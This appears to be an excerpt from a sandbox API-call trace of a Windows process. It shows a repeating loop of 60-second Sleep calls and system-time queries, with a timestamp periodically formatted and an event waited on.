	[0246.200] Sleep (dwMilliseconds=0xea60) 
	[0246.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a7615e0, dwHighDateTime=0x1d50a6a)) 
	[0246.215] Sleep (dwMilliseconds=0xea60) 
	[0246.231] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a787740, dwHighDateTime=0x1d50a6a)) 
	[0246.231] Sleep (dwMilliseconds=0xea60) 
	[0246.247] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a7ad8a0, dwHighDateTime=0x1d50a6a)) 
	[0246.247] Sleep (dwMilliseconds=0xea60) 
	[0246.262] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a7d3a00, dwHighDateTime=0x1d50a6a)) 
	[0246.262] Sleep (dwMilliseconds=0xea60) 
	[0246.278] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a7f9b60, dwHighDateTime=0x1d50a6a)) 
	[0246.278] Sleep (dwMilliseconds=0xea60) 
	[0246.293] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a81fcc0, dwHighDateTime=0x1d50a6a)) 
	[0246.293] Sleep (dwMilliseconds=0xea60) 
	[0246.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a845e20, dwHighDateTime=0x1d50a6a)) 
	[0246.309] Sleep (dwMilliseconds=0xea60) 
	[0246.325] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a86bf80, dwHighDateTime=0x1d50a6a)) 
	[0246.325] Sleep (dwMilliseconds=0xea60) 
	[0246.340] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a8920e0, dwHighDateTime=0x1d50a6a)) 
	[0246.340] Sleep (dwMilliseconds=0xea60) 
	[0246.356] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a8b8240, dwHighDateTime=0x1d50a6a)) 
	[0246.356] Sleep (dwMilliseconds=0xea60) 
	[0246.372] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a8de3a0, dwHighDateTime=0x1d50a6a)) 
	[0246.372] Sleep (dwMilliseconds=0xea60) 
	[0246.387] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a904500, dwHighDateTime=0x1d50a6a)) 
	[0246.387] Sleep (dwMilliseconds=0xea60) 
	[0246.403] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a92a660, dwHighDateTime=0x1d50a6a)) 
	[0246.403] Sleep (dwMilliseconds=0xea60) 
	[0246.418] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a9507c0, dwHighDateTime=0x1d50a6a)) 
	[0246.419] Sleep (dwMilliseconds=0xea60) 
	[0246.434] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a976920, dwHighDateTime=0x1d50a6a)) 
	[0246.434] Sleep (dwMilliseconds=0xea60) 
	[0246.449] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a99ca80, dwHighDateTime=0x1d50a6a)) 
	[0246.449] Sleep (dwMilliseconds=0xea60) 
	[0246.465] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a9c2be0, dwHighDateTime=0x1d50a6a)) 
	[0246.465] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557902800\r\n") returned 12
	[0246.465] ResetEvent (hEvent=0xc) returned 1
	[0246.465] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0246.466] Sleep (dwMilliseconds=0xea60) 
	[0246.480] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a9e8d40, dwHighDateTime=0x1d50a6a)) 
	[0246.481] Sleep (dwMilliseconds=0xea60) 
	[0246.496] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7aa0eea0, dwHighDateTime=0x1d50a6a)) 
	[0246.496] Sleep (dwMilliseconds=0xea60) 
	[0246.543] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7aa812c0, dwHighDateTime=0x1d50a6a)) 
	[0246.543] Sleep (dwMilliseconds=0xea60) 
	[0246.559] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7aaa7420, dwHighDateTime=0x1d50a6a)) 
	[0246.559] Sleep (dwMilliseconds=0xea60) 
	[0246.574] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7aacd580, dwHighDateTime=0x1d50a6a)) 
	[0246.574] Sleep (dwMilliseconds=0xea60) 
	[0246.590] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7aaf36e0, dwHighDateTime=0x1d50a6a)) 
	[0246.590] Sleep (dwMilliseconds=0xea60) 
	[0246.605] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ab19840, dwHighDateTime=0x1d50a6a)) 
	[0246.605] Sleep (dwMilliseconds=0xea60) 
	[0246.624] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ab3f9a0, dwHighDateTime=0x1d50a6a)) 
	[0246.624] Sleep (dwMilliseconds=0xea60) 
	[0246.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ab65b00, dwHighDateTime=0x1d50a6a)) 
	[0246.637] Sleep (dwMilliseconds=0xea60) 
	[0246.652] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ab8bc60, dwHighDateTime=0x1d50a6a)) 
	[0246.652] Sleep (dwMilliseconds=0xea60) 
	[0246.668] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7abb1dc0, dwHighDateTime=0x1d50a6a)) 
	[0246.668] Sleep (dwMilliseconds=0xea60) 
	[0246.684] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7abd7f20, dwHighDateTime=0x1d50a6a)) 
	[0246.684] Sleep (dwMilliseconds=0xea60) 
	[0246.699] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7abfe080, dwHighDateTime=0x1d50a6a)) 
	[0246.699] Sleep (dwMilliseconds=0xea60) 
	[0246.715] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ac241e0, dwHighDateTime=0x1d50a6a)) 
	[0246.715] Sleep (dwMilliseconds=0xea60) 
	[0246.730] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ac4a340, dwHighDateTime=0x1d50a6a)) 
	[0246.730] Sleep (dwMilliseconds=0xea60) 
	[0246.746] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ac704a0, dwHighDateTime=0x1d50a6a)) 
	[0246.746] Sleep (dwMilliseconds=0xea60) 
	[0246.761] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ac96600, dwHighDateTime=0x1d50a6a)) 
	[0246.761] Sleep (dwMilliseconds=0xea60) 
	[0246.777] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7acbc760, dwHighDateTime=0x1d50a6a)) 
	[0246.777] Sleep (dwMilliseconds=0xea60) 
	[0246.793] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ace28c0, dwHighDateTime=0x1d50a6a)) 
	[0246.793] Sleep (dwMilliseconds=0xea60) 
	[0246.809] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ad08a20, dwHighDateTime=0x1d50a6a)) 
	[0246.809] Sleep (dwMilliseconds=0xea60) 
	[0246.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ad2eb80, dwHighDateTime=0x1d50a6a)) 
	[0246.824] Sleep (dwMilliseconds=0xea60) 
	[0246.839] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ad54ce0, dwHighDateTime=0x1d50a6a)) 
	[0246.839] Sleep (dwMilliseconds=0xea60) 
	[0246.855] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ad7ae40, dwHighDateTime=0x1d50a6a)) 
	[0246.855] Sleep (dwMilliseconds=0xea60) 
	[0246.871] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.871] Sleep (dwMilliseconds=0xea60) 
	[0246.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7adc7100, dwHighDateTime=0x1d50a6a)) 
	[0246.886] Sleep (dwMilliseconds=0xea60) 
	[0246.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7aded260, dwHighDateTime=0x1d50a6a)) 
	[0246.903] Sleep (dwMilliseconds=0xea60) 
	[0246.917] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ae133c0, dwHighDateTime=0x1d50a6a)) 
	[0246.917] Sleep (dwMilliseconds=0xea60) 
	[0246.949] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ae5f680, dwHighDateTime=0x1d50a6a)) 
	[0246.949] Sleep (dwMilliseconds=0xea60) 
	[0246.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ae857e0, dwHighDateTime=0x1d50a6a)) 
	[0246.964] Sleep (dwMilliseconds=0xea60) 
	[0246.980] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7aeab940, dwHighDateTime=0x1d50a6a)) 
	[0246.980] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557904601\r\n") returned 12
	[0246.980] ResetEvent (hEvent=0xc) returned 1
	[0246.980] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0246.997] Sleep (dwMilliseconds=0xea60) 
	[0247.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7aef7c00, dwHighDateTime=0x1d50a6a)) 
	[0247.011] Sleep (dwMilliseconds=0xea60) 
	[0247.029] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7af1dd60, dwHighDateTime=0x1d50a6a)) 
	[0247.029] Sleep (dwMilliseconds=0xea60) 
	[0247.042] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7af43ec0, dwHighDateTime=0x1d50a6a)) 
	[0247.042] Sleep (dwMilliseconds=0xea60) 
	[0247.058] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7af6a020, dwHighDateTime=0x1d50a6a)) 
	[0247.058] Sleep (dwMilliseconds=0xea60) 
	[0247.073] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7af90180, dwHighDateTime=0x1d50a6a)) 
	[0247.073] Sleep (dwMilliseconds=0xea60) 
	[0247.089] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7afb62e0, dwHighDateTime=0x1d50a6a)) 
	[0247.089] Sleep (dwMilliseconds=0xea60) 
	[0247.104] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7afdc440, dwHighDateTime=0x1d50a6a)) 
	[0247.104] Sleep (dwMilliseconds=0xea60) 
	[0247.122] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b0025a0, dwHighDateTime=0x1d50a6a)) 
	[0247.122] Sleep (dwMilliseconds=0xea60) 
	[0247.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b028700, dwHighDateTime=0x1d50a6a)) 
	[0247.136] Sleep (dwMilliseconds=0xea60) 
	[0247.152] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b04e860, dwHighDateTime=0x1d50a6a)) 
	[0247.152] Sleep (dwMilliseconds=0xea60) 
	[0247.214] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b0e6de0, dwHighDateTime=0x1d50a6a)) 
	[0247.214] Sleep (dwMilliseconds=0xea60) 
	[0247.229] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b10cf40, dwHighDateTime=0x1d50a6a)) 
	[0247.229] Sleep (dwMilliseconds=0xea60) 
	[0247.245] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b1330a0, dwHighDateTime=0x1d50a6a)) 
	[0247.245] Sleep (dwMilliseconds=0xea60) 
	[0247.261] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b159200, dwHighDateTime=0x1d50a6a)) 
	[0247.261] Sleep (dwMilliseconds=0xea60) 
	[0247.276] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b17f360, dwHighDateTime=0x1d50a6a)) 
	[0247.276] Sleep (dwMilliseconds=0xea60) 
	[0247.292] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b1a54c0, dwHighDateTime=0x1d50a6a)) 
	[0247.292] Sleep (dwMilliseconds=0xea60) 
	[0247.307] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b1cb620, dwHighDateTime=0x1d50a6a)) 
	[0247.307] Sleep (dwMilliseconds=0xea60) 
	[0247.323] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b1f1780, dwHighDateTime=0x1d50a6a)) 
	[0247.323] Sleep (dwMilliseconds=0xea60) 
	[0247.339] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b2178e0, dwHighDateTime=0x1d50a6a)) 
	[0247.339] Sleep (dwMilliseconds=0xea60) 
	[0247.354] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b23da40, dwHighDateTime=0x1d50a6a)) 
	[0247.354] Sleep (dwMilliseconds=0xea60) 
	[0247.370] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b263ba0, dwHighDateTime=0x1d50a6a)) 
	[0247.370] Sleep (dwMilliseconds=0xea60) 
	[0247.386] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b289d00, dwHighDateTime=0x1d50a6a)) 
	[0247.386] Sleep (dwMilliseconds=0xea60) 
	[0247.401] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b2afe60, dwHighDateTime=0x1d50a6a)) 
	[0247.401] Sleep (dwMilliseconds=0xea60) 
	[0247.416] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b2d5fc0, dwHighDateTime=0x1d50a6a)) 
	[0247.417] Sleep (dwMilliseconds=0xea60) 
	[0247.432] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b2fc120, dwHighDateTime=0x1d50a6a)) 
	[0247.432] Sleep (dwMilliseconds=0xea60) 
	[0247.448] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b322280, dwHighDateTime=0x1d50a6a)) 
	[0247.448] Sleep (dwMilliseconds=0xea60) 
	[0247.463] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b3483e0, dwHighDateTime=0x1d50a6a)) 
	[0247.463] Sleep (dwMilliseconds=0xea60) 
	[0247.480] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b36e540, dwHighDateTime=0x1d50a6a)) 
	[0247.480] Sleep (dwMilliseconds=0xea60) 
	[0247.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b3946a0, dwHighDateTime=0x1d50a6a)) 
	[0247.495] Sleep (dwMilliseconds=0xea60) 
	[0247.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b3ba800, dwHighDateTime=0x1d50a6a)) 
	[0247.518] Sleep (dwMilliseconds=0xea60) 
	[0247.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b3e0960, dwHighDateTime=0x1d50a6a)) 
	[0247.526] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557906461\r\n") returned 12
	[0247.526] ResetEvent (hEvent=0xc) returned 1
	[0247.526] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0247.527] Sleep (dwMilliseconds=0xea60) 
	[0247.542] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b406ac0, dwHighDateTime=0x1d50a6a)) 
	[0247.542] Sleep (dwMilliseconds=0xea60) 
	[0247.557] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b42cc20, dwHighDateTime=0x1d50a6a)) 
	[0247.557] Sleep (dwMilliseconds=0xea60) 
	[0247.572] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b452d80, dwHighDateTime=0x1d50a6a)) 
	[0247.572] Sleep (dwMilliseconds=0xea60) 
	[0247.588] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b478ee0, dwHighDateTime=0x1d50a6a)) 
	[0247.588] Sleep (dwMilliseconds=0xea60) 
	[0247.604] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b49f040, dwHighDateTime=0x1d50a6a)) 
	[0247.604] Sleep (dwMilliseconds=0xea60) 
	[0247.619] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b4c51a0, dwHighDateTime=0x1d50a6a)) 
	[0247.619] Sleep (dwMilliseconds=0xea60) 
	[0247.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b4eb300, dwHighDateTime=0x1d50a6a)) 
	[0247.635] Sleep (dwMilliseconds=0xea60) 
	[0247.650] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b511460, dwHighDateTime=0x1d50a6a)) 
	[0247.651] Sleep (dwMilliseconds=0xea60) 
	[0247.666] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b5375c0, dwHighDateTime=0x1d50a6a)) 
	[0247.666] Sleep (dwMilliseconds=0xea60) 
	[0247.682] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b55d720, dwHighDateTime=0x1d50a6a)) 
	[0247.682] Sleep (dwMilliseconds=0xea60) 
	[0247.697] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b583880, dwHighDateTime=0x1d50a6a)) 
	[0247.697] Sleep (dwMilliseconds=0xea60) 
	[0247.713] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b5a99e0, dwHighDateTime=0x1d50a6a)) 
	[0247.713] Sleep (dwMilliseconds=0xea60) 
	[0247.729] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b5cfb40, dwHighDateTime=0x1d50a6a)) 
	[0247.729] Sleep (dwMilliseconds=0xea60) 
	[0247.744] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b5f5ca0, dwHighDateTime=0x1d50a6a)) 
	[0247.744] Sleep (dwMilliseconds=0xea60) 
	[0247.760] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b61be00, dwHighDateTime=0x1d50a6a)) 
	[0247.760] Sleep (dwMilliseconds=0xea60) 
	[0247.775] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b641f60, dwHighDateTime=0x1d50a6a)) 
	[0247.775] Sleep (dwMilliseconds=0xea60) 
	[0247.791] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b6680c0, dwHighDateTime=0x1d50a6a)) 
	[0247.791] Sleep (dwMilliseconds=0xea60) 
	[0247.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b68e220, dwHighDateTime=0x1d50a6a)) 
	[0247.807] Sleep (dwMilliseconds=0xea60) 
	[0247.822] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b6b4380, dwHighDateTime=0x1d50a6a)) 
	[0247.822] Sleep (dwMilliseconds=0xea60) 
	[0247.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b6da4e0, dwHighDateTime=0x1d50a6a)) 
	[0247.838] Sleep (dwMilliseconds=0xea60) 
	[0247.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b700640, dwHighDateTime=0x1d50a6a)) 
	[0247.857] Sleep (dwMilliseconds=0xea60) 
	[0247.869] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b7267a0, dwHighDateTime=0x1d50a6a)) 
	[0247.869] Sleep (dwMilliseconds=0xea60) 
	[0247.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b74c900, dwHighDateTime=0x1d50a6a)) 
	[0247.885] Sleep (dwMilliseconds=0xea60) 
	[0247.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b772a60, dwHighDateTime=0x1d50a6a)) 
	[0247.900] Sleep (dwMilliseconds=0xea60) 
	[0247.939] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b7bed20, dwHighDateTime=0x1d50a6a)) 
	[0247.939] Sleep (dwMilliseconds=0xea60) 
